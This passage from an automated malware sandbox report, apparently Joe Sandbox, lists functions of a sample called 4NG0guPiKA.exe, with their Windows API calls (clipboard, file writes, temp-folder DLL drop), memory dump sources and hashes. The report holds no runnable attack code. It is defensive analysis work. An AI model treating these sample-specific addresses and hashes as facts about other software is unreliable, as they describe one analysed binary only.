                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AF
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E7
                                                                                                            • OpenClipboard.USER32(00000000), ref: 004055F7
                                                                                                            • EmptyClipboard.USER32 ref: 004055FD
                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405609
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405613
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405627
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405647
                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405652
                                                                                                            • CloseClipboard.USER32 ref: 00405658
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                            • String ID: {
                                                                                                            • API String ID: 590372296-366298937
                                                                                                            • Opcode ID: 0c7871d9c118b0e9bc82f4af322ee916726f515fd3ec4b55100c1069ec2247ae
                                                                                                            • Instruction ID: 9fa9afbe460ba73b362fbd7a7e80f39848d7c2b38d0fa32ac3ffaaa5a75fb061
                                                                                                            • Opcode Fuzzy Hash: 0c7871d9c118b0e9bc82f4af322ee916726f515fd3ec4b55100c1069ec2247ae
                                                                                                            • Instruction Fuzzy Hash: 4AB16B70900209BFDF219F60DD89AAE7B79FB04315F50803AFA05BA1A0C7759E52DF69
                                                                                                            Function 004045CA Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 269stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404619
                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00404643
                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 004046F4
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 004046FF
                                                                                                            • lstrcmpiW.KERNEL32(Call,004226D0,00000000,?,?), ref: 00404731
                                                                                                            • lstrcatW.KERNEL32(?,Call), ref: 0040473D
                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474F
                                                                                                              • Part of subcall function 004056AA: GetDlgItemTextW.USER32(?,?,00000400,00404786), ref: 004056BD
                                                                                                              • Part of subcall function 0040617E: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\4NG0guPiKA.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,774D3420,00403512), ref: 004061E1
                                                                                                              • Part of subcall function 0040617E: CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                                              • Part of subcall function 0040617E: CharNextW.USER32(?,"C:\Users\user\Desktop\4NG0guPiKA.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,774D3420,00403512), ref: 004061F5
                                                                                                              • Part of subcall function 0040617E: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,774D3420,00403512), ref: 00406208
                                                                                                            • GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 00404810
                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040482B
                                                                                                            • SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048B1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                            • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet$Call
                                                                                                            • API String ID: 2246997448-2514212979
                                                                                                            • Opcode ID: 93a521dd52dbb562047e66d8ed4f73cc22a9918706a58848e32179005cd4fe03
                                                                                                            • Instruction ID: fc6e5784adbf23f3bf0ca4204261aafad130db7b69f5cfc08d06a9dfd3cb4e02
                                                                                                            • Opcode Fuzzy Hash: 93a521dd52dbb562047e66d8ed4f73cc22a9918706a58848e32179005cd4fe03
                                                                                                            • Instruction Fuzzy Hash: 1B916FB2900209ABDB11AFA1CC85AAF77B8EF85354F10847BF701B72D1D77C99418B69
                                                                                                            Function 00402770 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFindFirst
                                                                                                            • String ID:
                                                                                                            • API String ID: 1974802433-0
                                                                                                            • Opcode ID: e985ba924887a1bc27921ead0041ac8d1a9f7f1065ea0f82ea0bc3cd49787025
                                                                                                            • Instruction ID: c3eebe46d33317c4d9c4db9deeb30b83dd141210d4acf70d00b973005abdca29
                                                                                                            • Opcode Fuzzy Hash: e985ba924887a1bc27921ead0041ac8d1a9f7f1065ea0f82ea0bc3cd49787025
                                                                                                            • Instruction Fuzzy Hash: 81F05EB1614114DBDB00DBA4DD499AEB378FF14318F20097AE141F31D0D6B45940DB2A
                                                                                                            Function 00405C08 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 136stringmemoryfileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C18
                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C3C
                                                                                                            • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C45
                                                                                                              • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                                                              • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                                                            • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C62
                                                                                                            • wsprintfA.USER32 ref: 00405C80
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CBB
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CCA
                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D02
                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D58
                                                                                                            • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D6A
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00405D71
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405D78
                                                                                                              • Part of subcall function 00405B56: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\4NG0guPiKA.exe,80000000,00000003), ref: 00405B5A
                                                                                                              • Part of subcall function 00405B56: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                                            • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
                                                                                                            • API String ID: 1265525490-3322868524
                                                                                                            • Opcode ID: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
                                                                                                            • Instruction ID: dd28b8746f6bac9015e409c36d2f5baf321d2fce784c03eddf9b1c2e257c4ca8
                                                                                                            • Opcode Fuzzy Hash: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
                                                                                                            • Instruction Fuzzy Hash: 9741E271604B19BBD2216B715C4DF6B3B6CEF41754F14453BBA01B62D2EA3CA8018EBD
                                                                                                            Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                            • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                            • String ID: F
                                                                                                            • API String ID: 941294808-1304234792
                                                                                                            • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                                                            • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
                                                                                                            • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                                                            • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
                                                                                                            Function 004042E0 Relevance: 13.6, APIs: 9, Instructions: 99windowstringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040436A
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040437E
                                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001), ref: 0040439B
                                                                                                            • GetSysColor.USER32(?), ref: 004043AC
                                                                                                            • SendMessageW.USER32(00000000,00000443,?,?), ref: 004043BA
                                                                                                            • SendMessageW.USER32(00000000,00000445,?,04010000), ref: 004043C8
                                                                                                            • lstrlenW.KERNEL32(?,?,04010000,?,?,?,00000000), ref: 004043CD
                                                                                                            • SendMessageW.USER32(00000000,00000435,?,00000000), ref: 004043DA
                                                                                                            • SendMessageW.USER32(00000000,00000449,?,?), ref: 004043EF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$ButtonCheckColorItemlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1008850623-0
                                                                                                            • Opcode ID: 11b25a5882e482cc4bb954ceb8ac25c4d956a406a47e3dc3acd2e145a1a4205b
                                                                                                            • Instruction ID: 6404b5b34e5ce3e62085b934271d78e479a703510769b93e2f3efd78726f1448
                                                                                                            • Opcode Fuzzy Hash: 11b25a5882e482cc4bb954ceb8ac25c4d956a406a47e3dc3acd2e145a1a4205b
                                                                                                            • Instruction Fuzzy Hash: D331A0B1A00109BFDB01AF64DD85A7D3BA9FB44744F00407AFA05FB2A0D7799E62DB58
                                                                                                            Function 100022EB Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 134memorystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(?), ref: 10002391
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100023B2
                                                                                                            • CLSIDFromString.OLE32(?,00000000), ref: 100023BF
                                                                                                            • GlobalAlloc.KERNEL32(00000040), ref: 100023DD
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023F8
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 1000241A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1575114385.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1575078403.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1575136466.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1575158059.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Alloc$ByteCharFreeFromMultiStringWidelstrlen
                                                                                                            • String ID: @H1v
                                                                                                            • API String ID: 3579998418-3152185570
                                                                                                            • Opcode ID: d06520f5c61e510f0831b34fc4ed5dc6ae45d33c03c026c0edd8301773c2f489
                                                                                                            • Instruction ID: 896c08f96dc03187adf01b888d28386c50d9513e33e57f95a3092ffc5e904c0a
                                                                                                            • Opcode Fuzzy Hash: d06520f5c61e510f0831b34fc4ed5dc6ae45d33c03c026c0edd8301773c2f489
                                                                                                            • Instruction Fuzzy Hash: A3419FB4504706EFF324DF249C94A6A77E8FB443D0F11892DF98AC6199CB34AA94CB61
                                                                                                            Function 0040617E Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\4NG0guPiKA.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,774D3420,00403512), ref: 004061E1
                                                                                                            • CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                                            • CharNextW.USER32(?,"C:\Users\user\Desktop\4NG0guPiKA.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,774D3420,00403512), ref: 004061F5
                                                                                                            • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,774D3420,00403512), ref: 00406208
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Char$Next$Prev
                                                                                                            • String ID: "C:\Users\user\Desktop\4NG0guPiKA.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 589700163-3100106079
                                                                                                            • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                                                            • Instruction ID: e0619f79a043cffb4c3b00824a243f33de9385cd0f0c41224b0956f888f04927
                                                                                                            • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                                                            • Instruction Fuzzy Hash: 3511C47680021295EB307B548C40BB762F8EF957A0F56403FE996B72C2E77C5C9282BD
                                                                                                            Function 004024EE Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 54filestringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nso68A0.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nso68A0.tmp\System.dll,00000400,?,?,00000021), ref: 0040252F
                                                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nso68A0.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nso68A0.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nso68A0.tmp\System.dll,00000400,?,?,00000021), ref: 00402536
                                                                                                            • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nso68A0.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402568
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                                            • String ID: 8$C:\Users\user\AppData\Local\Temp\nso68A0.tmp$C:\Users\user\AppData\Local\Temp\nso68A0.tmp\System.dll
                                                                                                            • API String ID: 1453599865-2630244177
                                                                                                            • Opcode ID: c163f65ad7e3cc19a1ecb41abf68fb20e754719ac06291c3626fea40b4e8fc87
                                                                                                            • Instruction ID: b6741c74acf97665735c623be1ff62c12e58b25bca11cb73faf7774dd427f28f
                                                                                                            • Opcode Fuzzy Hash: c163f65ad7e3cc19a1ecb41abf68fb20e754719ac06291c3626fea40b4e8fc87
                                                                                                            • Instruction Fuzzy Hash: A5019671A44204FBD700AFA0DE49EAF7278AB50319F20053BF102B61D2D7BC5D41DA2D
                                                                                                            Function 00404196 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 004041B3
                                                                                                            • GetSysColor.USER32(00000000), ref: 004041CF
                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 004041DB
                                                                                                            • SetBkMode.GDI32(?,?), ref: 004041E7
                                                                                                            • GetSysColor.USER32(?), ref: 004041FA
                                                                                                            • SetBkColor.GDI32(?,?), ref: 0040420A
                                                                                                            • DeleteObject.GDI32(?), ref: 00404224
                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 0040422E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
